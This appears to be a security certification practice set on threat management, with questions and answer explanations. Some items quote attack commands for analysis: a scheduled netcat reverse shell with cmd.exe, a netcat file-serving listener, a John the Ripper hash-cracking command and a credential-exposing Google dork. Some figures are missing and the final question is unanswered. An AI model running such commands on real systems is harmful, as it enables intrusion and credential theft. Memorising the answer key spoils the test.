Chapter 1: Domain 1: Threat Management Questions 1 - 100
51. What type of control review will focus on change management as a major element in its assessment scope? A. Operational control review B. Technical control review C. Detective control review D. Responsive control review
A. A review of operational controls will often look at change management, separation of duties and other personnel controls, and process-based controls. Many administrative controls are part of an operational control review. These are sometimes conducted as Service Organization Control (SOC) audits with SOC 1, 2, and 3 reports generated depending on the level and depth of the assessment.
74. During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened? A. Automated shunning B. Network link failure C. Back-off algorithms D. A BGP route change
A. Automated shunning, whether via an IPS or other technology, can block attackers but can also prevent penetration testers from being able to conduct scans or attacks. When planning a white-box penetration test, it is typical to discuss the presence of technologies that may block or limit the test and to either work around them or to disable them for the tester's IP addresses if they are not directly in scope.
14. Charles uses the following command while investigating a Windows workstation used by his organization's vice president of finance who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organization's cleaning staff after-hours. What does he know if the user ID shown is the only user ID able to log into the system, and he is investigating on August 12, 2017? C:\Users\bigfish>wmic netlogin get name,lastlogon,badpasswordcount BadPasswordCount LastLogon Name NT AUTHORITY\SYSTEM 0 20170811203748.000000-240 Finance\bigfish A. The account has been compromised. B. No logins have occurred. C. The last login was during business hours. D. Charles cannot make any determinations from this information.
A. Charles can see that no invalid logins occurred and that someone logged in as the user after business hours. This means that the account has likely been compromised and that he should investigate how the password was lost. (In many cases, Charles needs to ask the VP of finance about bad password habits like writing it down or using a simple password.)
7. During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be? IMAGE HERE A. Determine the reason for the ports being open. B. Investigate the potentially compromised workstation. C. Run a vulnerability scan to identify vulnerable services. D. Reenable the workstation's local host firewall.
A. Cynthia's first action should be to determine whether there is a legitimate reason for the workstation to have the listed ports open.
45. Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device? IMAGE HERE A. The MAC address B. The OS flags C. The system's banner D. The IP address
A. Device manufacturer identification relies on the MAC address that includes a vendor prefix. Since MAC addresses can be changed in software, this is not guaranteed to be accurate, but in most cases, you can reasonably expect it to match the manufacturer of the NIC. The complete list of prefixes can be found at http://standards-oui.ieee.org/ oui/oui.txt.
82. Rick's manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get? A. EV B. DV C. OV D. IV
A. Extended Validation (EV) certificates require additional action to validate that the requester's legal identity is known, as well as the operational and physical presence of the website owner. In addition, the requesting organization has to prove that the domain owner has control over the domain name and that the person requesting the certificate has the authority to do so. Finally, they require a signature requirement for an authorized officer of the company. DV certificates require domain ownership validation, OV certificates require proof of the right to manage the domain name, and IV certificates are made up for this question.
24. Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization's footprint the most? A. Limit information available via the organizational website without authentication. B. Use a secure domain registration. C. Limit technology references in job postings. D. Purge all document metadata before posting.
A. Limiting the information available about an organization by requiring authentication will strongly limit the ability of potential attackers to gather information. Secure domain registration may conceal the registration contact's information but does not provide any real additional protection. Limiting technologies listed in a job posting can help limit what attackers may find out, but most organizations would prefer to better match candidates. Finally, purging all metadata can help protect information about internal systems and devices but is difficult to enforce, and document metadata is not a primary source of information about most organizations.
71. During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called? A. Pretexting B. OSINT C. A tag-out D. Profiling
A. Pretexting is a form of social engineering that relies on lies about the social engineer's motives. In this case, Fred is giving his targets reasons to believe he is legitimately a member of the organization's support team. OSINT refers to open source intelligence, which is data gathered from public sources. A tag-out sometimes refers to handing off to another member of a penetration test team, while profiling is conducted while gathering information about an individual, team, or organization before conducting a social engineering attack.
97. Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic? IMAGE HERE A. The firewall B. The router C. The distribution switch D. The Windows 2012 server
A. Since Andrea is attempting to stop external scans from gathering information about her network topology, the firewall is the best place to stop them. A well-designed ruleset can stop, or at least limit, the amount of network topology information that attackers can collect.
68. Lauren's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command: at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe What does it do? A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. B. It uses the AT command to dial a remote host via NetBIOS. C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.
A. The at command can be used to schedule Windows tasks. This task starts netcat as a reverse shell using cmd.exe via port 443 every Friday at 8:30 p.m. local time. Lauren should be concerned, as this allows traffic in that otherwise might be blocked!
70. Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network? A. net use B. net user C. net group D. net config
A. The net use command will list any network shares that the workstation is using, allowing Isaac to identify file servers or others with file sharing that the workstation is configured to use. net user will show user accounts for the local PC, net group is only usable on domain controllers, and net config allows the server and workstation services to be controlled.
64. Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using? A. SYN cookies B. ACK-ACK C. TCP frogging D. SYN replay
A. Using SYN cookies allows a server to act as though its SYN queue is larger than it is, reducing or completely preventing the issues encountered during a SYN flood. Discarding SYNs from the queue and waiting for a SYN-ACK allows the server to prevent resource exhaustion while still responding to legitimate connection requests. Of course, SYN cookies do nothing against DOS attacks that go further than a SYN flood!
2. During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organization's network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option? A. Perform a DNS brute-force attack. B. Use an nmap ping sweep. C. Perform a DNS zone transfer. D. Use an nmap stealth scan.
A. While it may seem strange, a DNS brute-force attack that queries a list of IPs, common subdomains, or other lists of targets will often bypass intrusion detection and prevention systems that do not pay particular attention to DNS queries. Cynthia may even be able to find a DNS server that is not protected by the organization's IPS! nmap scans are commonly used during reconnaissance, and Cynthia can expect them to be detected since they are harder to conceal. Cynthia shouldn't expect to be able to perform a zone transfer, and if she can, a well-configured IPS should immediately flag the event.
49. Which of the following tools can be used to passively gather the information required to generate a network topology map? A. Wireshark B. nmap C. SolarWinds Network Mapper D. Nessus
A. Wireshark can be used to capture network traffic, allowing you to review traffic information to build a network topology based on time to live, IP addresses, and other information. nmap and SolarWinds Network Mapper both rely on active scans to generate topologies, and Nessus does not provide a network topology generation capability.
16. Angela is designing her organization's data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela's best design option? A. Administrative virtual machines run on administrator workstations B. A jump host C. A bastion host D. Use ssh or RDP from administrative workstations
B. A jump host, or jump box, allows for easier logging of administrative access and can serve as an additional layer of protection between administrative workstations and the protected network. In this case, Angela's needs are best served by a jump host. Bastion hosts are fully exposed to attacks; administrative virtual machines can be useful but don't make central auditing quite as easy and may allow a compromised virtual machine host to be a problem. Finally, direct ssh or RDP requires auditing of all administrative workstations and could allow a compromised workstation to cause issues by allowing it to directly connect to the secure network.
58. Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user's desktop, she sees the following command on the screen: user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt What is the user attempting to do? A. They are attempting to hash a file. B. They are attempting to crack hashed passwords. C. They are attempting to crack encrypted passwords. D. They are attempting a pass-the-hash attack.
B. Alice's suspicious user appears to be attempting to crack LANMAN hashes using a custom word list. The key clues here are the john application, the LM hash type, and the location of the word list.
65. What two phases of the NIST penetration testing cycle are often repeated during a test? A. Planning and discovery B. Discovery and attack C. Planning and attack D. Discovery and reporting
B. As attacks succeed, they will often create additional opportunities for discovery, resulting in more attacks. Planning the test itself, as well as the final reporting phase, should occur only once per penetration test.
30. Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process? A. WHOIS lookups B. Banner grabbing C. BGP looking glass usage D. Registrar checks
B. Banner grabbing is an active process and requires a connection to a remote host to grab the banner. The other methods are all passive and use third-party information that does not require a direct lookup against a remote host.
34. As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in? A. Vulnerability scanning B. Privilege escalation C. Patching D. Installing additional tools
B. By default Apache does not run as an administrative user. In fact, it typically runs as a limited user. To take further useful action, Frank should look for a privilege escalation path that will allow him to gain further access
43. Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action? A. #iptables-policy INPUT DROP B. #iptables-policy SERVICE DROP C. #iptables-policy OUTPUT DROP D. #iptables-policy FORWARD DROP
B. By default, an iptables firewall will have INPUT, OUTPUT, and FORWARD chains. Geoff should use the DROP command on all three to stop all traffic to or from a machine.
57. While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here: 0.0.0.0 symantec.com 0.0.0.0 mcafee.com 0.0.0.0 microsoft.com 0.0.0.0 kapersky.com Why would the malware make this change? A. To redirect 0.0.0.0 to known sites B. To prevent antivirus updates C. To prevent other attackers from compromising the system D. To enable remote access to the system
B. Changing the hosts file has been used by various malware packages to prevent updates by stopping DNS resolution of the antivirus updates update server. Lauren should check to see whether the antivirus on the system is up-to-date but will probably need to recommend a rebuild or reinstallation of the system.
89. Chris discovers the following entries in /var/log/auth.log. What is most likely occurring? IMAGE HERE A. A user has forgotten their password. B. A brute-force attack against the root account C. A misconfigured service D. A denial-of-service attack against the root account
B. Repeated failures from the same host likely indicate a brute-force attack against the root account.
55. While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person? IMAGE HERE A. An encrypted RAT B. A VPN application C. A secure web browser D. A base64-encoded packet transfer utility
B. ESP packets are part of the IPSEC protocol suite and are typically associated with a tunnel or VPN. Ryan should check for a VPN application and determine what service or system the user may have connected to.
67. Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization's staff. If she wants to review the metadata from the photos, what tool can she use to do so? A. Strings B. Exiftool C. Wireshark D. Stegdetect
B. Exiftool provides access to image and document metadata, including information about the camera, geotagging, time and date information, and a variety of other useful metadata if it is present. Strings is useful for pulling text from files but does not provide usefully formatted metadata. Wireshark is a packet capture utility, and stegdetect is used to detect steganographically concealed data in files.
6. Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool? A. Signature based B. Heuristic based Chapter 3 C. Trend based D. Availability based
B. Heuristic detection methods run the potential malware application and track what occurs. This can allow the anti-malware tool to determine whether the behaviors and actions of the program match those common to malware, even if the file does not match the fingerprint of known malware packages.
Use the following network diagram and scenario to answer the next three questions: IMAGE HERE Lauren is a security analyst who has been tasked with performing nmap scans of her organization's network. She is a new hire and has been given this logical diagram of the organization's network but has not been provided with any additional detail. 96. Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact? A. Location A B. Location B C. Location C D. Location D
B. Lauren will see the most important information about her organization at location B, which provides a view of data center servers behind the data center firewall. To get more information, she should request that the client network firewall ruleset include a rule allowing her scanner to scan through the firewall to all ports for all systems on all protocols.
Use the following network diagram and scenario to answer the next three questions: IMAGE HERE Lauren is a security analyst who has been tasked with performing nmap scans of her organization's network. She is a new hire and has been given this logical diagram of the organization's network but has not been provided with any additional detail. 94. Lauren wants to determine what IP addresses to scan from location A. How can she find this information? A. Scan the organization's web server and then scan the other 255 IP addresses in its subnet. B. Query DNS to find her organization's registered hosts. C. Contact ICANN to request the data. D. Use traceroute to identify the network that the organization's domain resides in.
B. Lauren's best option from this list is to query DNS using WHOIS. She might also choose to use a BGP looking glass, but most of the information she will need will be in WHOIS. If she simply scans the network the web server is in, she may end up scanning a third-party hosting provider, or other systems that aren't owned by her organization in the /24 subnet range. Contacting ICANN isn't necessary with access to WHOIS, and depending on what country Lauren is in, ICANN may not have the data she wants. Finally, using traceroute will only show the IP address of the system she queries; she needs more data to perform a useful scan in most instances.
73. Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior? A. A firewall B. A netflow collector C. A honeypot D. A BGP monitor
B. Network flows can be used to identify traffic patterns between systems that are atypical or that connect to systems that are known malware or malicious sites. Using his SIEM, Lucca can look for top talkers, behavior or trend-based anomalies, or other correlations that point to an issue.
41. The company that Lauren works for is making significant investments in infrastructureas-a-service hosting to replace its traditional data center. Members of her organization's management have expressed concerns about data remanence when Lauren's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern? A. Zero-wipe drives before moving systems. B. Use full-disk encryption. C. Use data masking. D. Span multiple virtual disks to fragment data
B. Lauren's team should use full-disk encryption or volume encryption and should secure the encryption keys properly. This will ensure that any data that remains cannot be exposed to future users of the virtual infrastructure. While many cloud providers have implemented technology to ensure that this won't happen, Lauren can avoid any potential issues by ensuring that she has taken proactive action to prevent data exposure. Using a zero wipe is often impossible because virtual environments may move without her team's intervention, data masking will not prevent unmasked data or temporary data stored on the virtual disks from being exposed, and spanning multiple virtual disks will still leave data accessible, albeit possibly in fragmented form.
44. The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment? A. Use a different scanning tool. B. Rely on vendor testing and audits. C. Engage a third-party tester. D. Use a VPN to scan inside the vendor's security perimeter
B. Most SaaS providers do not want their customers conducting port scans of their service, and many are glad to provide security assertions and attestations including audits, testing information, or contractual language that addresses potential security issues. Using a different scanning tool, engaging a third-party tester, or even using a VPN are not typically valid answers in a scenario like this.
47. Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance? A. Use the worldwide nmap database. B. Search for his domain in Shodan. C. Use the OpenVAS central vulnerability data repository. D. Check against the CVE database for his domain.
B. Of these answers, only Shodan provides a searchable listing of vulnerable hosts including details of the system that was scanned. OpenVAS, CVE, and nmap do not provide central databases of vulnerable systems.
52. As part of her reconnaissance process for her organization's internal security review, Olivia uses Shodan to search for hosts within her target's IP range. She discovers the following Shodan entry listing for one of her target's devices. What should she do with this information? IMAGE HERE A. Activate the incident response process. B. Contact the device administrator. C. Log in to validate the finding. D. Nothing, because this is a false positive.
B. Olivia's first action should be to contact the device administrator. There is no indication that the device has been compromised, and logging in to validate the finding is not typically part of a reconnaissance process.
92. Which of the following capabilities is not a typical part of an SIEM system? A. Alerting B. Performance management C. Data aggregation D. Log retention
B. SIEM systems typically provide alerting, event and log correlation, compliance data gathering and reporting, data and log aggregation, and data retention capabilities. This also means that they can be used for forensic analysis as they should be designed to provide a secure copy of data. They do not typically provide performance management-specific capabilities.
25. Cassandra's nmap scan of an open wireless network (192.168.10/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown? IMAGE HERE A. A virtual machine B. A wireless router C. A broadband router D. A print server
B. Since Cassandra is scanning a wireless network and the system is using an IP address that is commonly used for commodity wireless routers, her best guess should be that this is a wireless router that can be accessed via ssh and that is providing a web management interface and print services. The OS fingerprinting that nmap provides is not always reliable, and the VirtualBox match is a false positive in this case. The actual host scanned is an Asus router running open source firmware and additional software.
86. Charles needs to make sure he has found the correct social media profile for a target of his OSINT process. Which of the following includes the three critical items needed to uniquely identify the majority of Americans? A. Height, weight, and eye color B. Date of birth, gender, and zip code C. Zodiac sign, gender, and zip code D. Age, height, and weight
B. Studies have shown that 87 percent of the U.S. population can be uniquely identified with their date of birth, gender, and ZIP code. If Charles can obtain this information, he has a very high chance of identifying the right individual.
87. While reviewing logs from users with root privileges on an administrative jump box, Alex discovers the following suspicious command: nc -l -p 43501 < example.zip What happened? A. The user set up a reverse shell running as example.zip. B. The user set up netcat as a listener to push example.zip. C. The user set up a remote shell running as example.zip. D. The user set up netcat to receive example.zip.
B. The -l flag is a key hint here, indicating that netcat was set up as a listener. Any connection to port 43501 will result in example.zip being sent to the connecting application. Typically, a malicious user would then connect to that port using netcat from a remote system to download the file.
21. Alice is conducting a penetration test of a client's systems. As part of her test, she gathers information from the social media feeds of staff members who work for her client. What phase of the NIST penetration testing process is she currently in? A. Social engineering B. Discovery C. Analysis D. Social media profiling
B. The NIST SP 800-115 guide describes four penetration testing phases: planning, discovery, attack, and reporting. Alice is conducting a discovery activity. During this phase, she might also scan systems and networks, perform passive intelligence gathering, or use tools to gather additional information about her target.
19. As a U.S. government employee, Michael is required to ensure that the network devices that he procures have a verified chain of custody for every chip and component that goes into them. What is this program known as? A. Gray market procurement B. Trusted Foundry C. White market procurement D. Chain of Procurement
B. The U.S. DoD Trusted Foundry program works to assure the integrity and confidentiality of integrated circuit design and manufacturing. This helps to ensure that agents of foreign governments are not able to insert flaws or code into the ICs that could be leveraged for intelligence or cyberwarfare activities.
54. Selah has been tasked with gathering information to increase her penetration testing team's understanding of their customer's Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs? A. nmap B. theHarvester C. Shodan D. osint-ng
B. The best option in this list for Selah's purposes is theHarvester. It combines search engine-based searches with Shodan and other data sources to gather email addresses, subdomain information, employee names, and a variety of other types of useful footprinting data. Nmap is useful for port scanning but typically won't find email addresses and employee names, Shodan is a vulnerability search engine, and osint-ng is a made-up tool name.
27. Lauren has local access to a Windows workstation and wants to gather information about the organization that it belongs to. What type of information can she gain if she executes the command nbtstat -c? A. MAC addresses and IP addresses of local systems B. NetBIOS name-to-IP address mappings C. A list of all NetBIOS systems that the host is connected to D. NetBIOS MAC-to-IP address mappings
B. The command nbtstat -c shows the contents of the NetBIOS name cache and shows a list of name-to-IP address mappings.
79. In his role as the SOC operator, Frank regularly scans a variety of servers in his organization. After two months of reporting multiple vulnerabilities on a Windows file server, Frank recently escalated the issue to the server administrator's manager. At the next weekly scan window, Frank noticed that all of the vulnerabilities were no longer active; however, ports 137, 139, and 445 were still showing as open. What most likely happened? A. The server administrator blocked the scanner with a firewall. B. The server was patched. C. The vulnerability plug-ins were updated and no longer report false positives. D. The system was offline.
B. The system is showing normal ports for a Windows file server. It is most likely that Frank's escalation to management resulted in action by the server administrator.
99. Which of the three key objectives of cybersecurity is often ensured by using techniques like hashing and the use of tools like Tripwire? A. Confidentiality B. Integrity C. Identification D. Availability
B. The three objectives of cybersecurity are confidentiality, integrity, and availability. Hashing and the use of integrity monitoring tools like Tripwire are both techniques used to preserve integrity; in fact, file integrity monitoring tools typically use hashing to verify that files remain intact and unchanged.
9. Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this? IMAGE HERE A. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP # iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW C. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW # iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW # iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP D. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP # iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP # iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW
B. These commands will add filters to the INPUT ruleset that block traffic specifically from hosts A and B, while allowing only port 25 from host C. Option D might appear attractive, but it allows all traffic instead of only SMTP. Option A only drops SMTP traffic from host B (and all of the other hosts in its /24 segment), while Option C allows traffic in from the hosts you want to block!
18. Rick is auditing a Cisco router configuration and notes the following line: login block-for 120 attempt 5 with 60 What type of setting has been enabled? A. A DDoS prevention setting B. A back-off setting C. A telnet security setting D. An autologin prevention setting
B. This setting blocks all logins for 120 seconds when five failed attempts occur within 60 seconds. This can slow down brute-force hacking attempts, but Rick should recommend that the organization he is working with may want to consider properly isolating the administrative interfaces via a protected network segment instead of just using a back-off algorithm if they haven't already.
91. While reviewing email logs for his domain's email server, Rick notices that a single remote host is sending email to usernames that appear to be in alphabetical order: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] ... This behavior continues for thousands of entries, resulting in many bounced email messages, but some make it through. What type of reconnaissance has Rick encountered? A. Brute force B. Domain harvesting C. Domain probe D. Email list builder
B. This type of probe is known as domain harvesting and relies on message rejection error messages to help the individual running the probe to determine which email accounts actually exist. Rick may want to disable delivery receipts, disable nondeliverable responses, or investigate more advanced techniques like false nondeliverable responses or recipient filtering and tar pitting.
53. Kathleen wants to verify on a regular basis that a file has not changed on the system that she is responsible for. Which of the following methods is best suited to this? A. Use sha1sum to generate a hash for the file and write a script to check it periodically. B. Install and use Tripwire. C. Periodically check the MAC information for the file using a script. D. Encrypt the file and keep the key secret so the file cannot be modified.
B. Tripwire and similar programs are designed to monitor a file for changes and to report on changes that occur. They rely on file fingerprints (hashes) and are designed to be reliable and scalable. Kathleen's best bet is to use a tool designed for the job, rather than to try to write her own.
10. After filling out the scoping document for a penetration test, including details of what tools, techniques, and targets are included in the test, what is the next step that Jessica needs to take to conduct the test? A. Port scan the target systems. B. Get sign-off on the document. C. Begin passive fingerprinting. D. Notify local law enforcement.
B. While it may be tempting to start immediately after finishing scoping, Jessica's next step should be to ensure that she has appropriate sign-off and agreement to the scope, timing, and effort involved in the test.
77. Lauren is contacted by a concerned administrator who notes that almost all of their Windows 10 Enterprise workstations are reporting the following issue after a patch deployment. What important policy may be missing? IMAGE HERE A. Active hours B. Required reboots C. Automatic updates D. Network time synchronization
B. Windows 10 has quite a few built-in options for reboots after patches, but if users are logged in and a forced restart is not set via Group Policy, patches may not be installed for a very long time. Lauren should work with system administrators and user groups to ensure that a reasonable reboot policy can be put into place.
85. What two pieces of information does nmap need to estimate network path distance? A. IP address and TTL B. TTL and operating system C. Operating system and BGP flags D. TCP flags and IP address
B. nmap can combine operating system identification and time to live to take a reasonable guess at the number of hops in the network path between the scanner and a remote system. The operating system guess will provide the base time to live, and the TTL counter will decrement at each hop. Given these two pieces of information, nmap takes an educated but often very accurate guess.
32. Alex wants to scan a protected network and has gained access to a system that can communicate to both his scanning system and the internal network, as shown in the image here. What type of nmap scan should Alex conduct to leverage this host if he cannot install nmap on system A? IMAGE HERE A. A reflection scan B. A proxy scan C. A randomized host scan D. A ping-through scan
B. nmap supports the use of both HTTP and SOCKS4 proxies, allowing Alex to configure the remote host as an HTTP proxy and bounce his scans through it. This can allow nmap users to leverage their scanning tools without installing them on a protected host or network.
36. Alex has been asked to assess the likelihood of reconnaissance activities against her organization (a small, regional business). Her first assignment is to determine the likelihood of port scans against systems in her organization's DMZ. How should she rate the likelihood of this occurring? A. Low B. Medium C. High D. There is not enough information for Alex to provide a rating.
C. Alex knows that systems that are exposed to the Internet like DMZ systems are constantly being scanned. She should rate the likelihood of the scan occurring as high. In fact, there is a good chance that a scan will be occurring while she is typing up her report!
83. While reviewing web server logs, Danielle notices the following entry. What occurred? 10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404.php&theme= total 200 A. A theme was changed. B. A file was not found. C. There was an attempt to edit the 404 page. D. The 404 page was displayed.
C. Attackers often use built-in editing tools that are inadvertently or purposefully exposed to edit files to inject malicious code. In this case, someone has attempted to modify the 404 file displayed by WordPress. Anybody who received a 404 error from this installation could have been exposed to malicious code inserted into the 404 page or simply a defaced 404 page.
37. Lucy is the SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently. While Lucy is monitoring the SIEM, she notices that all of the log sources from her organization's New York branch have stopped reporting for the past 24 hours. What type of detection rules or alerts should she configure to make sure she is aware of this sooner next time? A. Heuristic B. Behavior C. Availability D. Anomaly
C. Availability analysis targets whether a system or service is working as expected. While an SIEM may not have direct availability analysis capabilities, reporting on when logs and other data are not received from source systems can help detect outages. Ideally, Lucy's organization should be using a system monitoring tool that can alarm on availability issues as well as common system problems such as excessive memory, network, disk, or CPU usage.
22. What is the default nmap scan type when nmap is not provided with a scan type flag? A. A TCP FIN scan B. A TCP connect scan C. A TCP SYN scan D. A UDP scan
C. By default, nmap uses a TCP SYN scan. If the user does not have proper socket privileges (such as root on a Linux system), it will use a TCP connect scan.
1. Charles wants to use active discovery techniques as part of his reconnaissance efforts. Which of the following techniques fits his criteria? A. Google searching B. Using a Shodan search C. Using DNS reverse lookup D. Querying a PGP key server
C. DNS reverse lookup is an active technique. Google and Shodan are both search engines, while a PGP key server does not interact with the target site and is considered passive reconnaissance. If you're not immediately familiar with a technique or technology, you can often reduce the possible options. Here, ruling out a Google search or querying a PGP server are obviously not active techniques, and Shodan also says it is a search, making a DNS reverse lookup a good guess, even if you're not familiar with it.
15. Lauren's honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting? IMAGE HERE A. Zero-day attacks B. SQL injection C. Network scans D. DDoS attacks
C. Detection systems placed in otherwise unused network space will detect scans that blindly traverse IP ranges. Since no public services are listed, attackers who scan this range can be presumed to be hostile and are often immediately blocked by security devices that protect production systems.
13. What term is often used for attackers during a penetration test? A. Black team B. Blue team C. Red team D. Green team
C. During penetration tests, red teams are attackers, blue teams are defenders, and the white team establishes the rules of engagement and performance metrics for the test.
12. Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh? A. Add an iptables rule blocking root logins. B. Add root to the sudoers group. C. Change sshd_config to deny root login. D. Add a network IPS rule to block root logins.
C. Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Chris's goal.
50. Lauren wants to use an advanced Google query to search for information that is not readily available as part of her reconnaissance efforts. What term is commonly used to describe these searches? A. Google whacks B. SuperGoogles C. Google dorks D. Google gizmos
C. Google dorks are advanced search strings that can help locate information that is otherwise difficult to find. They can be used to find things like SQL injection, login pages, links, domain-specific information, and a host of other data.
59. nmap provides a standardized way to name hardware and software that it detects. What is this called? A. CVE B. HardwareEnum C. CPE D. GearScript
C. nmap's Common Platform Enumeration is a standardized way to name applications, operating systems, and hardware. CPE output starts with cpe:/a for applications, /h for hardware, and /o for operating systems.
81. Adam is reviewing his organization's security footprint by conducting reconnaissance activities. After reviewing a list of Google dorks, he runs the following search: "mysqli_connect" ext:inc If it returns data, what should he recommend in his report to management? A. Block MySQL connections from remote hosts. B. Initiate the organization's incident response process. C. Immediately change MySQL passwords and review configurations. D. Change all MySQL connection strings.
C. If this Google search returns information, it will show MySQL connection information, including passwords. Adam should immediately report this finding to management and should recommend that all exposed passwords be changed immediately and that the misconfiguration that resulted in the files being exposed should be fixed, and the reason it occurred should be identified. This does not tell you whether MySQL services are exposed remotely and does not mean that an incident has already occurred. At this point, Adam only knows that a misconfiguration has occurred. Changing all of the connection strings won't fix the root issue.
40. During his analysis of a malware sample, John reviews the malware files and binaries without running them. What type of analysis is this? A. Automated analysis B. Dynamic analysis C. Static analysis D. Heuristic analysis
C. John is performing static analysis, which is analysis performed without running code. He can use tools or manually review the code (and, in fact, is likely to do both).
Use the following network diagram and scenario to answer the next three questions: IMAGE HERE Lauren is a security analyst who has been tasked with performing nmap scans of her organization's network. She is a new hire and has been given this logical diagram of the organization's network but has not been provided with any additional detail. 95. If Lauren runs a scan from location B that targets the servers on the data center network and then runs a scan from location C, what differences is she most likely to see between the scans? A. The scans will match. B. Scans from location C will show no open ports. C. Scans from location C will show fewer open ports. D. Scans from location C will show more open ports.
C. Most data center firewalls are configured to only allow the ports for publicly accessible services through to other networks. Location C is on an internal network, so Lauren will probably see more ports than if she tried to scan data center systems from location A, but it is likely that she will see far fewer ports than a portscan of the data center from inside the data center firewall will show.
5. A port scan of a remote system shows that port 3306 is open on a remote database server. What database is the server most likely running? A. Oracle B. Postgres C. MySQL D. Microsoft SQL
C. MySQL uses port 3306 as its default port. Oracle uses 1521, Postgres uses 5432, and Microsoft SQL uses 1433/1434.
48. Adam knows that netcat is a useful penetration testing tool. Which of the following is not a way that he can use netcat, if he is using it as his only tool? A. File transfer B. Port scanner C. Encrypted shell D. Reverse shell
C. Netcat can act as a relay, file transfer tool, reverse shell, TCP banner grabber, TCP port scanner, and in a multitude of other roles, but it does not include encryption capabilities. If Adam needs to encrypt his data, he will need another tool to perform that task.
100. The netflow collector that Sam's security team uses is capable of handling 1 gigabit of traffic per second. As Sam's organization has grown, it has increased its external network connection to a 2 gigabit per second external link and has begun to approach full utilization at various times during the day. If Sam's team does not have new budget money to purchase a more capable collector, what option can Sam use to still collect useful data? A. Enable QoS B. Enable netflow compression C. Enable sampling D. None of the above
C. Random or deterministic sampling can help Sam's team capture usable flows despite not being able to handle the full throughput of their network. Random sampling will capture a random packet out of every n packets, with n set by the user. Deterministic sampling simply takes the every nth packet that passes through, so Sam might sample the 1st, 11th, 21st, and so on. This means that small flows may be missed, but in this case, sampling half of all packets is still possible, meaning most flows will still be captured.
4. Charleen is preparing to conduct a scheduled reconnaissance effort against a client site. Which of the following is not typically part of the rules of engagement that are agreed to with a client for a reconnaissance effort? A. Timing B. Scope C. Exploitation methods D. Authorization
